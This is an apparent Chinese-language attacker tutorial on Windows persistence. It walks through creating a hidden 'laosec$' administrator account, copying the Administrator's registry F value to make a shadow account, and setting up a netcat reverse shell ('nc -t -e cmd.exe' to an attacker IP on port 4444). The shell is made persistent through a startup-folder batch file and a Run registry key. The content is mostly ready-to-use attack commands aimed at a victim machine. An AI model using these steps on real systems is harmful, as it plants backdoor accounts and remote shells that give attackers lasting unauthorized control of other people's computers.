影子账号创建
net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@
net localgroup administrators laosec /add #将普通账号laosec添加进administrators组
net user laosec$ 123admiN@ /add #创建隐藏账号laosec$密码为123admiN@(计算机管理可见)
net localgroup administrators laosec$ /add #将隐藏账号laosec$添加到administrators组中
步骤一:打开注册表
WIN+R–>regedit #注册表编辑器命令
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
#遇到没有权限问题对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限
步骤二:修改隐藏账号
在Users目录下有00000XXX开头的文件还有Names
找到Names文件夹下的administrator单击,可以看到右侧的类型,其类型的值便对应着上面00000XXX
选中与administrator所对应的00000XXX在右侧双击F键值,在弹出窗口中将值内容全部复制
#此值要给予要创建的影子账号的F键值中
在Names中找到要修改账户的类型值,找到其对应的00000XXX,并将刚才复制的内容覆盖掉其影子账户的F中的值
导出Names下的影子账户为1.reg
导出Users下影子账户对应的00000XXX为2.reg
步骤三:删除隐藏账号
net user laosec$ /del #删除隐藏账号laosec$
步骤四:创建隐藏账号
将1.reg导入到注册表中
将2.reg导入到注册表中
步骤五:注销登录验证
通过上传NC并配置注册表或开机自启动程序->重启服务器来获取到目标及其的CMD Shell
攻击者与受害者网络能够互通
攻击者VPS必须时刻监听相对应的端口
NC常规测试
nc -lvvp port #攻击者VPS操作 侦听本地port
nc -t -e cmd.exe ip port #受害者操作 正向连接到攻击者的VPS
1. 自启动目录
在受害者主机中进入到开机自启动目录下
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
创建sys.bat内容为
start /b nc -t -e cmd.exe 192.168.31.132 4444
在攻击者主机开启侦听
重启受害者主机,等待shell反弹
2. 注册表启动
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “sysone” /t REG_SZ /d “C:sys.bat” /f
参数说明:
/v 所选项之下要添加的值名
/t RegKey 数据类型 如果忽略,则采用 REG_SZ
/d 要分配给添加的注册表 ValueName 的数据
/f 不用提示就强行改写现有注册表项
在攻击者主机开启侦听
重启受害者主机,等待shell反弹
结果验证
